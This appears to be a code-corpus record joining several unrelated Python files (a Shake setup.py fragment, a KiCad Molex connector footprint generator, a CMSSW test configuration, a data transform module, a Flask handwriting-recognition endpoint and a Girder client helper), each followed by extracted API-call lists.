lines = map(lambda s: s.strip(), data.splitlines())
return [l for l in lines if l and not l.startswith('#')]
data = read_from(get_path('shake', '__init__.py')).encode('utf8')
version = str(re.search(b"__version__\s*=\s*u?'([^']+)'", data).group(1)).strip()
desc = str(re.search(b'"""(.+)"""', data, re.DOTALL).group(1)).strip()
setup(
name='Shake',
version=version,
author='<NAME>',
author_email='<EMAIL>',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
url='http://github.com/lucuma/shake',
license='MIT license (see LICENSE)',
description='A lightweight web framework based on Werkzeug and Jinja2 as an alternative to Flask',
long_description=desc,
install_requires=get_requirements(),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
]
)
| [
"os.path.dirname",
"setuptools.find_packages",
"io.open",
"re.search"
] | [((136, 161), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (151, 161), False, 'import os\n'), ((206, 246), 'io.open', 'io.open', (['filepath', '"""rt"""'], {'encoding': '"""utf8"""'}), "(filepath, 'rt', encoding='utf8')\n", (213, 246), False, 'import io\n'), ((819, 834), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (832, 834), False, 'from setuptools import setup, find_packages\n'), ((570, 621), 're.search', 're.search', (['b"__version__\\\\s*=\\\\s*u?\'([^\']+)\'"', 'data'], {}), '(b"__version__\\\\s*=\\\\s*u?\'([^\']+)\'", data)\n', (579, 621), False, 'import re\n'), ((649, 690), 're.search', 're.search', (['b\'"""(.+)"""\'', 'data', 're.DOTALL'], {}), '(b\'"""(.+)"""\', data, re.DOTALL)\n', (658, 690), False, 'import re\n')] |
#!/usr/bin/env python3
'''
kicad-footprint-generator is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
kicad-footprint-generator is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with kicad-footprint-generator. If not, see < http://www.gnu.org/licenses/ >.
'''
import sys
import os
#sys.path.append(os.path.join(sys.path[0],"..","..","kicad_mod")) # load kicad_mod path
# export PYTHONPATH="${PYTHONPATH}<path to kicad-footprint-generator directory>"
sys.path.append(os.path.join(sys.path[0], "..", "..", "..")) # load parent path of KicadModTree
from math import sqrt
import argparse
import yaml
from helpers import *
from KicadModTree import *
sys.path.append(os.path.join(sys.path[0], "..", "..", "tools")) # load parent path of tools
from footprint_text_fields import addTextFields
# --- Series / library metadata -------------------------------------------
series = "Mini-Fit_Sr"
series_long = 'Mini-Fit Sr. Power Connectors'
manufacturer = 'Molex'
orientation = 'V'            # vertical (top entry) variant
number_of_rows = 2
datasheet = 'http://www.molex.com/pdm_docs/sd/439151404_sd.pdf'

# Supported pin counts per row for this series
pins_per_row_range = [3, 4, 5, 6, 7]

# Molex part number template.
# n = total number of circuits (pins per row * number of rows)
part_code = "43915-xx{n:02}"

# --- Geometry (all dimensions in mm, from the datasheet) -----------------
pitch = 10                   # pin-to-pin spacing within one row
drill = 2.8                  # through-hole drill diameter
offset_second_pad = 4.4      # offset between the two drills forming one pad
pitch_row = offset_second_pad + 8.06   # row-to-row spacing

pad_to_pad_clearance = 3
max_annular_ring = 1
min_annular_ring = 0.15

# Locating pins (position on x axis and drill diameter)
x_loc = 8.43
r_loc = 3.0

# Pad height starts from the pitch minus the required pad-to-pad clearance,
# then is clamped so the annular ring stays within
# [min_annular_ring, max_annular_ring] around the drill.
pad_size = [offset_second_pad + 0.1, pitch - pad_to_pad_clearance]
pad_size[1] = min(max(pad_size[1], drill + 2 * min_annular_ring),
                  drill + 2 * max_annular_ring)

# Footprint variants generated for each pin count: one with thermal vias
# inside the pads, one with plain pads only.
version_params = {
    'with_thermals':{
        'description': ', With thermal vias in pads',
        'fp_name_suffix': '_ThermalVias',
        'thermals': True
    },
    'only_pads':{
        'description': '',
        'fp_name_suffix': '',
        'thermals': False
    }
}
def generate_one_footprint(pins, params, configuration):
pad_silk_off = configuration['silk_pad_clearance'] + configuration['silk_line_width']/2
mpn = part_code.format(n=pins*number_of_rows)
# handle arguments
orientation_str = configuration['orientation_options'][orientation]
footprint_name = configuration['fp_name_format_string'].format(man=manufacturer,
series=series,
mpn=mpn, num_rows=number_of_rows, pins_per_row=pins_per_row, mounting_pad = "",
pitch=pitch, orientation=orientation_str)
footprint_name += params['fp_name_suffix']
kicad_mod = Footprint(footprint_name)
desc_format_str = "Molex {:s}, {:s}{:s}, {:d} Pins per row ({:s}), generated with kicad-footprint-generator"
kicad_mod.setDescription(desc_format_str.format(series_long, mpn, params['description'], pins, datasheet))
kicad_mod.setTags(configuration['keyword_fp_string'].format(series=series,
orientation=orientation_str, man=manufacturer,
entry=configuration['entry_direction'][orientation]))
#calculate fp dimensions
#ref: http://www.molex.com/pdm_docs/sd/439151404_sd.pdf
#A = distance between mounting holes
A = pins * pitch + 1.41
#B = distance between end pin centers
B = (pins - 1) * pitch
#E = length of part
E = pins * pitch + 0.9
#connector width
W = 19.16
#corner positions
y1 = -(E-B)/2
y2 = y1 + E
x1 = -1.15
x2 = x1 + W
TL = 5
TW = 13
body_edge={
'left':x1,
'right':x2,
'bottom':y2,
'top': y1
}
bounding_box = {
'left': -pad_size[0]/2,
'right': pitch_row + offset_second_pad + pad_size[0]/2
}
pad_silk_off = configuration['silk_pad_clearance'] + configuration['silk_line_width']/2
#generate the pads
for row_idx in range(2):
for pad_idx in range(2):
kicad_mod.append(PadArray(
pincount=pins, start=[row_idx*pitch_row + pad_idx*offset_second_pad, 0],
initial=row_idx*pins+1, y_spacing=pitch, size=pad_size, drill=drill,
type=Pad.TYPE_THT, shape=Pad.SHAPE_RECT, layers=Pad.LAYERS_THT,
tht_pad1_shape=Pad.SHAPE_RECT))
#thermal vias
d_small = 0.3
s_small = d_small + 2*min_annular_ring
thermal_to_pad_edge = s_small/2 + 0.15
if params['thermals']:
for yi in range(pins):
for xi in range(number_of_rows):
n = xi*pins + yi + 1
pad_center_x = xi*pitch_row + offset_second_pad/2
pad_center_y = yi*pitch
pad_l = offset_second_pad + pad_size[0]
dy = (pad_size[1] - 2*thermal_to_pad_edge)/2
dx = (pad_l - 2*thermal_to_pad_edge)/4
#draw rectangle on F.Fab layer
# kicad_mod.append(RectLine(
# start=[pad_center_x - pad_l/2, pad_center_y - pad_size[1]/2],
# end=[pad_center_x + pad_l/2, pad_center_y + pad_size[1]/2],
# layer='F.Fab', width=configuration['fab_line_width']))
kicad_mod.append(PadArray(center=[pad_center_x, pad_center_y],
pincount=3, x_spacing=dx*2,
drill=d_small, size=s_small, initial=n, increment=0,
shape=Pad.SHAPE_CIRCLE, type=Pad.TYPE_THT, layers=Pad.LAYERS_THT))
kicad_mod.append(PadArray(center=[pad_center_x, pad_center_y - dy],
pincount=5, x_spacing=dx,
drill=d_small, size=s_small, initial=n, increment=0,
type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE, layers=Pad.LAYERS_THT))
kicad_mod.append(PadArray(center=[pad_center_x, pad_center_y + dy],
pincount=5, x_spacing=dx,
drill=d_small, size=s_small, initial=n, increment=0,
type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE, layers=Pad.LAYERS_THT))
# locating pins
kicad_mod.append(Pad(at=[x_loc, 5], type=Pad.TYPE_NPTH, shape=Pad.SHAPE_CIRCLE,
size=r_loc, drill=r_loc, layers=Pad.LAYERS_NPTH))
kicad_mod.append(Pad(at=[x_loc, B/2-A/2], type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE,
size=r_loc+0.5, drill=r_loc, layers=Pad.LAYERS_THT))
kicad_mod.append(Pad(at=[x_loc, B/2+A/2], type=Pad.TYPE_THT, shape=Pad.SHAPE_CIRCLE,
size=r_loc+0.5, drill=r_loc, layers=Pad.LAYERS_THT))
#mark pin-1 (bottom layer)
kicad_mod.append(RectLine(start=[-pad_size[0]/2, -pad_size[1]/2],
end=[offset_second_pad + pad_size[0]/2,pad_size[1]/2],offset=pad_silk_off,
width=configuration['silk_line_width'], layer='B.SilkS'))
#draw connector outline (basic)
kicad_mod.append(RectLine(start=[x1,y1],end=[x2,y2],
width=configuration['fab_line_width'], layer='F.Fab'))
#connector outline on F.SilkScreen
off = configuration['silk_line_width']
corner = [
{'y': -pad_size[1]/2 - pad_silk_off, 'x': x1-off},
{'y': y1 - off, 'x': x1-off},
{'y': y1 - off, 'x': x_loc-r_loc/2-0.5},
]
# kicad_mod.append(PolygoneLine(polygone=corner,
# width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(Line(start=[x_loc-r_loc/2-0.5, y1 - off],
end=[x_loc-TW/2-off, y1 - off],
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=corner,y_mirror=B/2,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=corner,x_mirror=x_loc,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=corner,y_mirror=B/2,x_mirror=x_loc,
width=configuration['silk_line_width'], layer='F.SilkS'))
#silk-screen between each pad
for i in range(pins-1):
ya = i * pitch + pad_size[1]/2 + pad_silk_off
yb = (i+1) * pitch - pad_size[1]/2 - pad_silk_off
kicad_mod.append(Line(start=[x1-off, ya],end=[x1-off, yb],
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(Line(start=[x2+off, ya],end=[x2+off, yb],
width=configuration['silk_line_width'], layer='F.SilkS'))
#draw the tabs at each end
def offsetPoly(poly_points, o, center_x, center_y):
    """Return a copy of *poly_points* with every vertex pushed away from the
    centre point (center_x, center_y) by *o* along each axis.

    The input list is not modified; a new list of {'y': ..., 'x': ...}
    dicts is returned.
    """
    shifted = []
    for point in poly_points:
        dy = o if point['y'] > center_y else -o
        dx = o if point['x'] > center_x else -o
        shifted.append({'y': point['y'] + dy, 'x': point['x'] + dx})
    return shifted
tab = [
{'y': y1,'x': x_loc-TW/2},
{'y': y1-TL,'x': x_loc-TW/2},
{'y': y1-TL,'x': x_loc+TW/2},
{'y': y1,'x': x_loc+TW/2},
]
kicad_mod.append(PolygoneLine(polygone=tab,
width=configuration['fab_line_width'], layer='F.Fab'))
kicad_mod.append(PolygoneLine(polygone=tab, y_mirror=B/2,
width=configuration['fab_line_width'], layer='F.Fab'))
tap_off = offsetPoly(tab, off, x_loc, B/2)
kicad_mod.append(PolygoneLine(polygone=tap_off,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=tap_off, y_mirror=B/2,
width=configuration['silk_line_width'], layer='F.SilkS'))
bounding_box['top'] = y1 - TL
bounding_box['bottom'] = y2 + TL
#inner-tab
T = 2
tab = [
{'y': y1-off,'x': x_loc-TW/2-off+T},
{'y': y1-off-TL+T,'x': x_loc-TW/2-off+T},
{'y': y1-off-TL+T,'x': x_loc+TW/2+off-T},
{'y': y1-off,'x': x_loc+TW/2+off-T},
]
kicad_mod.append(PolygoneLine(polygone=tab,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=tab,y_mirror=B/2,
width=configuration['silk_line_width'], layer='F.SilkS'))
#pin-1 marker
x = x1 - 1.5
m = 0.4
pin = [
{'x': x,'y': 0},
{'x': x-2*m,'y': -m},
{'x': x-2*m,'y': +m},
{'x': x,'y': 0},
]
kicad_mod.append(PolygoneLine(polygone=pin,
width=configuration['silk_line_width'], layer='F.SilkS'))
sl=3
pin = [
{'x': body_edge['left'], 'y': -sl/2},
{'x': body_edge['left'] + sl/sqrt(2), 'y': 0},
{'x': body_edge['left'], 'y': sl/2}
]
kicad_mod.append(PolygoneLine(polygone=pin,
width=configuration['fab_line_width'], layer='F.Fab'))
########################### CrtYd #################################
cx1 = roundToBase(bounding_box['left']-configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
cy1 = roundToBase(bounding_box['top']-configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
cx2 = roundToBase(bounding_box['right']+configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
cy2 = roundToBase(bounding_box['bottom'] + configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
kicad_mod.append(RectLine(
start=[cx1, cy1], end=[cx2, cy2],
layer='F.CrtYd', width=configuration['courtyard_line_width']))
######################### Text Fields ###############################
addTextFields(kicad_mod=kicad_mod, configuration=configuration, body_edges=body_edge,
courtyard={'top':cy1, 'bottom':cy2}, fp_name=footprint_name, text_y_inside_position='bottom')
##################### Output and 3d model ############################
model3d_path_prefix = configuration.get('3d_model_prefix','${KICAD6_3DMODEL_DIR}/')
lib_name = configuration['lib_name_format_string'].format(series=series, man=manufacturer)
model_name = '{model3d_path_prefix:s}{lib_name:s}.3dshapes/{fp_name:s}.wrl'.format(
model3d_path_prefix=model3d_path_prefix, lib_name=lib_name, fp_name=footprint_name)
kicad_mod.append(Model(filename=model_name))
output_dir = '{lib_name:s}.pretty/'.format(lib_name=lib_name)
if not os.path.isdir(output_dir): #returns false if path does not yet exist!! (Does not check path validity)
os.makedirs(output_dir)
filename = '{outdir:s}{fp_name:s}.kicad_mod'.format(outdir=output_dir, fp_name=footprint_name)
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(filename)
if __name__ == "__main__":
    # CLI entry point: load the global KLC config, overlay the series
    # config, then generate every footprint variant.
    parser = argparse.ArgumentParser(description='use confing .yaml files to create footprints.')
    parser.add_argument('--global_config', type=str, nargs='?', help='the config file defining how the footprint will look like. (KLC)', default='../../tools/global_config_files/config_KLCv3.0.yaml')
    parser.add_argument('--series_config', type=str, nargs='?', help='the config file defining series parameters.', default='../conn_config_KLCv3.yaml')
    args = parser.parse_args()
    # Load the global KLC configuration first ...
    with open(args.global_config, 'r') as config_stream:
        try:
            configuration = yaml.safe_load(config_stream)
        except yaml.YAMLError as exc:
            print(exc)
    # ... then overlay the series-specific settings on top of it.
    with open(args.series_config, 'r') as config_stream:
        try:
            configuration.update(yaml.safe_load(config_stream))
        except yaml.YAMLError as exc:
            print(exc)
    # One footprint per (variant, pin count) combination.
    # NOTE(review): `version_params` and `pins_per_row_range` are defined
    # elsewhere in this file, outside this block.
    for version in version_params:
        for pins_per_row in pins_per_row_range:
            generate_one_footprint(pins_per_row, version_params[version], configuration)
| [
"os.makedirs",
"argparse.ArgumentParser",
"os.path.join",
"footprint_text_fields.addTextFields",
"math.sqrt",
"yaml.safe_load",
"os.path.isdir"
] | [((892, 935), 'os.path.join', 'os.path.join', (['sys.path[0]', '""".."""', '""".."""', '""".."""'], {}), "(sys.path[0], '..', '..', '..')\n", (904, 935), False, 'import os\n'), ((1089, 1135), 'os.path.join', 'os.path.join', (['sys.path[0]', '""".."""', '""".."""', '"""tools"""'], {}), "(sys.path[0], '..', '..', 'tools')\n", (1101, 1135), False, 'import os\n'), ((11527, 11718), 'footprint_text_fields.addTextFields', 'addTextFields', ([], {'kicad_mod': 'kicad_mod', 'configuration': 'configuration', 'body_edges': 'body_edge', 'courtyard': "{'top': cy1, 'bottom': cy2}", 'fp_name': 'footprint_name', 'text_y_inside_position': '"""bottom"""'}), "(kicad_mod=kicad_mod, configuration=configuration, body_edges=\n body_edge, courtyard={'top': cy1, 'bottom': cy2}, fp_name=\n footprint_name, text_y_inside_position='bottom')\n", (11540, 11718), False, 'from footprint_text_fields import addTextFields\n'), ((12642, 12731), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""use confing .yaml files to create footprints."""'}), "(description=\n 'use confing .yaml files to create footprints.')\n", (12665, 12731), False, 'import argparse\n'), ((12282, 12307), 'os.path.isdir', 'os.path.isdir', (['output_dir'], {}), '(output_dir)\n', (12295, 12307), False, 'import os\n'), ((12392, 12415), 'os.makedirs', 'os.makedirs', (['output_dir'], {}), '(output_dir)\n', (12403, 12415), False, 'import os\n'), ((13210, 13239), 'yaml.safe_load', 'yaml.safe_load', (['config_stream'], {}), '(config_stream)\n', (13224, 13239), False, 'import yaml\n'), ((13405, 13434), 'yaml.safe_load', 'yaml.safe_load', (['config_stream'], {}), '(config_stream)\n', (13419, 13434), False, 'import yaml\n'), ((10550, 10557), 'math.sqrt', 'sqrt', (['(2)'], {}), '(2)\n', (10554, 10557), False, 'from math import sqrt\n')] |
# Configuration file for EmptySource
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
# Make configuration/runtime exceptions fatal so the test fails loudly.
process.load("FWCore.Framework.test.cmsExceptionsFatal_cff")
# Total number of events to generate: 8 luminosity sections of 5 events
# each (5 matches numberEventsInLuminosityBlock on the source below).
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(8*5)
)
# (run number, first luminosity block of that run) pairs, in ascending order.
runToLumi = ((2, 1), (10, 3), (20, 7))
def findRunForLumi(lumi):
    """Return the run number that luminosity block *lumi* belongs to.

    Scans ``runToLumi`` in order and returns the last run whose starting
    lumi section is <= *lumi*; lumis before the first entry map to the
    first run.
    """
    result = runToLumi[0][0]
    for run, first_lumi in runToLumi:
        if first_lumi > lumi:
            return result
        result = run
    return result
# EmptySource emits synthetic events; each run starts at the luminosity
# block given in `runToLumi`, with 5 events per lumi section.
process.source = cms.Source("EmptySource",
    firstLuminosityBlock = cms.untracked.uint32(1),
    firstLuminosityBlockForEachRun = cms.untracked.VLuminosityBlockID(*[cms.LuminosityBlockID(x,y) for x,y in runToLumi]),
    numberEventsInLuminosityBlock = cms.untracked.uint32(5),
    firstTime = cms.untracked.uint64(1000),
    timeBetweenEvents = cms.untracked.uint64(10)
)
# Pre-compute the expected (run, lumi, event) triple for every generated
# event, mirroring the EmptySource bookkeeping above, so EventIDChecker
# can verify what the source actually produces.
ids = cms.VEventID()
numberOfEventsInLumi = 0
numberOfEventsPerLumi = process.source.numberEventsInLuminosityBlock.value()
lumi = process.source.firstLuminosityBlock.value()
event = 0
oldRun = 2
# FIX: `xrange` exists only on Python 2; `range` iterates identically and
# keeps this configuration usable under both Python 2 and 3.
for i in range(process.maxEvents.input.value()):
    numberOfEventsInLumi += 1
    event += 1
    run = findRunForLumi(lumi)
    if numberOfEventsInLumi > numberOfEventsPerLumi:
        # Lumi section is full: advance to the next one and re-resolve run.
        numberOfEventsInLumi = 1
        lumi += 1
        run = findRunForLumi(lumi)
        if run != oldRun:
            # Event numbering restarts at 1 on a run boundary.
            event = 1
            oldRun = run
    ids.append(cms.EventID(run, lumi, event))
process.check = cms.EDAnalyzer("EventIDChecker", eventSequence = cms.untracked(ids))
process.print1 = cms.OutputModule("AsciiOutputModule")
process.p = cms.EndPath(process.check + process.print1)
| [
"FWCore.ParameterSet.Config.OutputModule",
"FWCore.ParameterSet.Config.LuminosityBlockID",
"FWCore.ParameterSet.Config.untracked.uint64",
"FWCore.ParameterSet.Config.VEventID",
"FWCore.ParameterSet.Config.EndPath",
"FWCore.ParameterSet.Config.EventID",
"FWCore.ParameterSet.Config.untracked",
"FWCore.P... | [((90, 109), 'FWCore.ParameterSet.Config.Process', 'cms.Process', (['"""TEST"""'], {}), "('TEST')\n", (101, 109), True, 'import FWCore.ParameterSet.Config as cms\n'), ((813, 827), 'FWCore.ParameterSet.Config.VEventID', 'cms.VEventID', ([], {}), '()\n', (825, 827), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1460, 1497), 'FWCore.ParameterSet.Config.OutputModule', 'cms.OutputModule', (['"""AsciiOutputModule"""'], {}), "('AsciiOutputModule')\n", (1476, 1497), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1511, 1554), 'FWCore.ParameterSet.Config.EndPath', 'cms.EndPath', (['(process.check + process.print1)'], {}), '(process.check + process.print1)\n', (1522, 1554), True, 'import FWCore.ParameterSet.Config as cms\n'), ((225, 251), 'FWCore.ParameterSet.Config.untracked.int32', 'cms.untracked.int32', (['(8 * 5)'], {}), '(8 * 5)\n', (244, 251), True, 'import FWCore.ParameterSet.Config as cms\n'), ((502, 525), 'FWCore.ParameterSet.Config.untracked.uint32', 'cms.untracked.uint32', (['(1)'], {}), '(1)\n', (522, 525), True, 'import FWCore.ParameterSet.Config as cms\n'), ((686, 709), 'FWCore.ParameterSet.Config.untracked.uint32', 'cms.untracked.uint32', (['(5)'], {}), '(5)\n', (706, 709), True, 'import FWCore.ParameterSet.Config as cms\n'), ((727, 753), 'FWCore.ParameterSet.Config.untracked.uint64', 'cms.untracked.uint64', (['(1000)'], {}), '(1000)\n', (747, 753), True, 'import FWCore.ParameterSet.Config as cms\n'), ((779, 803), 'FWCore.ParameterSet.Config.untracked.uint64', 'cms.untracked.uint64', (['(10)'], {}), '(10)\n', (799, 803), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1329, 1358), 'FWCore.ParameterSet.Config.EventID', 'cms.EventID', (['run', 'lumi', 'event'], {}), '(run, lumi, event)\n', (1340, 1358), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1423, 1441), 'FWCore.ParameterSet.Config.untracked', 'cms.untracked', (['ids'], {}), '(ids)\n', (1436, 1441), True, 'import FWCore.ParameterSet.Config as cms\n'), ((599, 
626), 'FWCore.ParameterSet.Config.LuminosityBlockID', 'cms.LuminosityBlockID', (['x', 'y'], {}), '(x, y)\n', (620, 626), True, 'import FWCore.ParameterSet.Config as cms\n')] |
# -*- coding: utf-8 -*-
"""
Provides functions for data transformation (currently only LLS) and
normalization.
"""
import numpy as np
def transform(raw_data, mode, direction='direct', **kwargs):
    """Apply a mathematical transformation (or its inverse) to data rows.

    Parameters
    ----------
    raw_data : ndarray
        2D array of shape (N, M) holding N data rows of M values each.
        In the 'direct' direction the array is shifted in place by its
        minimum before the transformed copy is returned.
    mode : str
        Transformation to use. Only 'log_log_sqrt' is supported: square
        root followed by two logarithms (each step offset by +1).
    direction : str, optional
        'direct' applies the transformation, 'inverse' undoes it.
        Default is 'direct'.
    **kwargs
        min_value : float
            (inverse only) Minimum that was subtracted during the direct
            transformation; it is lost by the shift and must be supplied
            to reconstruct the original data. Default is 1.

    Raises
    ------
    ValueError
        If *mode* or *direction* is not recognised.

    Returns
    -------
    ndarray
        Transformed data with the same shape as *raw_data*.
    """
    transform_modes = ['log_log_sqrt']
    if direction == 'direct':
        if mode != transform_modes[0]:
            raise ValueError('No valid transform mode entered. Allowed modes '
                             'are {0}'.format(transform_modes))
        # Shift so the minimum sits at zero (in place), then compress the
        # dynamic range: log(log(sqrt(x + 1) + 1) + 1).
        raw_data -= np.min(raw_data)
        return np.log(np.log(np.sqrt(raw_data + 1) + 1) + 1)
    if direction == 'inverse':
        if mode != transform_modes[0]:
            raise ValueError('No valid transform mode entered. Allowed modes '
                             'are {0}'.format(transform_modes))
        # Unwind the two exponentials and the square, then restore the
        # original offset.
        restored = (np.exp(np.exp(raw_data) - 1) - 1) ** 2 - 1
        restored += kwargs.get('min_value', 1)
        return restored
    raise ValueError('No valid transform direction entered. Allowed '
                     'directions are [\'direct\', \'inverse\']')
def normalize(raw_data, mode, factor=1, **kwargs):
    """Normalize data rows.

    Parameters
    ----------
    raw_data : array_like
        2D array of shape (N, M) with N data rows of M values each.
    mode : str
        Normalization method. Only 'total_intensity' is supported: each
        row is divided by its trapezoidal integral.
    factor : float, optional
        Extra scale applied after normalization, i.e. each row's integral
        becomes *factor*. Default is 1.
    **kwargs
        x_data : array_like
            Abscissa used for the trapezoidal integration. Defaults to
            ``np.arange(M)``.

    Raises
    ------
    ValueError
        If *mode* is not recognised.

    Returns
    -------
    ndarray
        Normalized data with the same shape as *raw_data*.
    """
    raw_data = np.asarray(raw_data)
    normalize_modes = ['total_intensity']
    if mode != normalize_modes[0]:
        raise ValueError('No valid normalization mode entered. Allowed modes '
                         'are {0}'.format(normalize_modes))
    n_points = raw_data.shape[1]
    x_data = kwargs.get('x_data', np.arange(n_points))
    # Per-row trapezoidal integral; broadcast its reciprocal over columns.
    row_integrals = np.trapz(raw_data, x=x_data, axis=1)
    conversion_factor = (1 / row_integrals)[:, np.newaxis]
    return raw_data * conversion_factor * factor
| [
"numpy.trapz",
"numpy.sqrt",
"numpy.asarray",
"numpy.exp",
"numpy.min",
"numpy.arange"
] | [((2588, 2608), 'numpy.asarray', 'np.asarray', (['raw_data'], {}), '(raw_data)\n', (2598, 2608), True, 'import numpy as np\n'), ((1677, 1693), 'numpy.min', 'np.min', (['raw_data'], {}), '(raw_data)\n', (1683, 1693), True, 'import numpy as np\n'), ((2814, 2838), 'numpy.arange', 'np.arange', (['x_data_points'], {}), '(x_data_points)\n', (2823, 2838), True, 'import numpy as np\n'), ((2880, 2916), 'numpy.trapz', 'np.trapz', (['raw_data'], {'x': 'x_data', 'axis': '(1)'}), '(raw_data, x=x_data, axis=1)\n', (2888, 2916), True, 'import numpy as np\n'), ((1769, 1790), 'numpy.sqrt', 'np.sqrt', (['(raw_data + 1)'], {}), '(raw_data + 1)\n', (1776, 1790), True, 'import numpy as np\n'), ((2117, 2133), 'numpy.exp', 'np.exp', (['raw_data'], {}), '(raw_data)\n', (2123, 2133), True, 'import numpy as np\n')] |
#Predictions performed by this module
#dependencies
import base64
import numpy as np
import io
from PIL import Image
import keras
from keras import backend as K
from keras.models import Sequential
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator, img_to_array
from model import Model, DecoderType
from main import infer2
from flask import request
from flask import jsonify
from flask import Flask
from imageio import imread
app = Flask(__name__)
"""
def get_model():
This function loads the already-built keras model
global model
model = load_model('model.h5')
print("Model loaded!")"""
def preprocess_image(image, target_size):
    """Convert a PIL image into a batch-of-one numpy array.

    The image is coerced to RGB if necessary, resized to *target_size*,
    turned into a float array and given a leading batch dimension so it
    matches the (1, H, W, C) shape a Keras model expects.
    """
    rgb = image if image.mode == "RGB" else image.convert("RGB")
    resized = rgb.resize(target_size)
    array = img_to_array(resized)
    return np.expand_dims(array, axis=0)
"""print(" * Loading Keras model ... ")
get_model()"""
@app.route("/predict", methods=["POST"])
def predict():
    """Handle a POST of a base64-encoded image and return the recognised
    handwritten text plus its probability as JSON.

    The request body is JSON with key 'image' holding a (possibly
    data-URL prefixed) base64 JPEG. The payload is decoded, fed through
    the SimpleHTR model via ``infer2`` and the result serialised back.
    """
    payload = request.get_json(force=True)
    b64_image = payload['image']
    b64_image = b64_image.replace("data:image/jpeg;base64,", "")
    print(b64_image)  # debug: dump the raw base64 payload to stdout
    raw_bytes = base64.b64decode(b64_image)
    img = imread(io.BytesIO(raw_bytes))
    # NOTE(review): hard-coded absolute path to the character list — this
    # only works on the author's machine; should come from configuration.
    char_list = list(open("/home/shikhar/Desktop/simpleHTR/SimpleHTR/model/charList.txt").read())
    htr_model = Model(char_list, decoder_type=0, must_restore=True, dump=True)
    result = infer2(htr_model, img)
    return jsonify({
        'text': result['text'],
        'probability': str(result['probability'])
    })
@app.route("/", methods=["GET"])
def hello():
    """Trivial GET endpoint used as a liveness check."""
    greeting = 'Hello'
    return greeting
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000) | [
"keras.preprocessing.image.img_to_array",
"flask.Flask",
"io.BytesIO",
"base64.b64decode",
"flask.request.get_json",
"numpy.expand_dims",
"main.infer2",
"flask.jsonify"
] | [((478, 493), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (483, 493), False, 'from flask import Flask\n'), ((815, 834), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['image'], {}), '(image)\n', (827, 834), False, 'from keras.preprocessing.image import ImageDataGenerator, img_to_array\n'), ((847, 876), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (861, 876), True, 'import numpy as np\n'), ((1412, 1440), 'flask.request.get_json', 'request.get_json', ([], {'force': '(True)'}), '(force=True)\n', (1428, 1440), False, 'from flask import request\n'), ((1566, 1591), 'base64.b64decode', 'base64.b64decode', (['encoded'], {}), '(encoded)\n', (1582, 1591), False, 'import base64\n'), ((1938, 1958), 'main.infer2', 'infer2', (['model', 'image'], {}), '(model, image)\n', (1944, 1958), False, 'from main import infer2\n'), ((2085, 2102), 'flask.jsonify', 'jsonify', (['response'], {}), '(response)\n', (2092, 2102), False, 'from flask import jsonify\n'), ((1611, 1630), 'io.BytesIO', 'io.BytesIO', (['decoded'], {}), '(decoded)\n', (1621, 1630), False, 'import io\n')] |
from typing import Any
import msgpack
from app.core.config import settings
from girder_client import GirderClient
from fastapi import HTTPException
from fastapi import Response
# Disk-cache configuration handed to GirderClient.
cache_settings = {
    "directory": "/tmp/cache",
    "eviction_policy": "least-frequently-used",
    # 2**20 bytes = 1 MiB. NOTE(review): the previous comment claimed
    # "1g" — if 1 GiB was intended this should be 2**30; confirm intent.
    "size_limit": 2**20,
}
# Lazily created module-level GirderClient singleton (see get_girder_client).
_gc = None
def get_girder_client(girder_token):
    """Return the shared GirderClient, authenticated with *girder_token*.

    The client is created once on first use (module-level singleton) and
    its token is refreshed on every call. A missing token is rejected
    with an HTTP 400.
    """
    global _gc
    if girder_token is None:
        raise HTTPException(status_code=400, detail="Invalid token.")
    if _gc is None:
        _gc = GirderClient(apiUrl=settings.GIRDER_API_URL, cacheSettings=cache_settings)
    _gc.setToken(girder_token)
    return _gc
class MsgpackResponse(Response):
    """FastAPI/Starlette response whose body is msgpack-serialised."""
    media_type = "application/msgpack"
    def render(self, content: Any) -> bytes:
        """Serialise *content* to msgpack bytes for the HTTP body."""
        return msgpack.packb(content)
| [
"msgpack.packb",
"girder_client.GirderClient",
